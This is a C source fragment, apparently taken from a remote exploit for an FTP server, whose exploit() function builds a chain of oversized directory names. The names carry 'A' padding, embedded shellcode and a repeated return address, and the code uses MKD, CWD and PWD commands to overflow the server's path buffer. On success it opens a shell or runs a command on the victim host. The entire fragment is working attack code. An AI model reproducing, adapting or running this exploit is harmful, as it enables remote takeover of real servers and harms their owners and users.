
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int * command ;
 int do_command (int) ;
 int exit (int) ;
 int exploit_ok (int) ;
 int fprintf (int ,char*) ;
 int ftp_cmd_err (int,char*,char*,char*,int,char*) ;
 char* heavenlycode ;
 char* longToChar (int ) ;
 int ret_addr ;
 int shell (int) ;
 int stderr ;
 char* strcreat (char*,char*,int) ;
 int strlen (char*) ;
 char* write_dir ;
 int xfree (char**) ;

void exploit(int fd)
{
        char res[1024];
        int heavenlycode_s;
        char *dir = ((void*)0);

        ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir");

        dir = strcreat(dir, "A", 255 - strlen(write_dir));
        ftp_cmd_err(fd, "MKD", dir, res, 1024, ((void*)0));
        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
        xfree(&dir);



        dir = strcreat(dir, "A", 255);
        ftp_cmd_err(fd, "MKD", dir, res, 1024, ((void*)0));
        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
        xfree(&dir);


        heavenlycode_s = strlen(heavenlycode);
        dir = strcreat(dir, "A", 254 - heavenlycode_s);
        dir = strcreat(dir, heavenlycode, 1);
        ftp_cmd_err(fd, "MKD", dir, res, 1024, ((void*)0));
        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
        xfree(&dir);


        dir = strcreat(dir, longToChar(ret_addr), 252 / 4);
        ftp_cmd_err(fd, "MKD", dir, res, 1024, ((void*)0));
        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
        xfree(&dir);



        dir = strcreat(dir, "AAA\"", 1);
        ftp_cmd_err(fd, "MKD", dir, res, 1024, ((void*)0));
        ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
        xfree(&dir);


        ftp_cmd_err(fd, "PWD", ((void*)0), res, 1024, ((void*)0));

        if (!exploit_ok(fd)) {
                if (command != ((void*)0)) {
                        exit (2);
                }
                fprintf(stderr, "Exploit failed\n");
                exit (1);
        }
        if (command == ((void*)0))
                shell(fd);
        else
                do_command(fd);
}
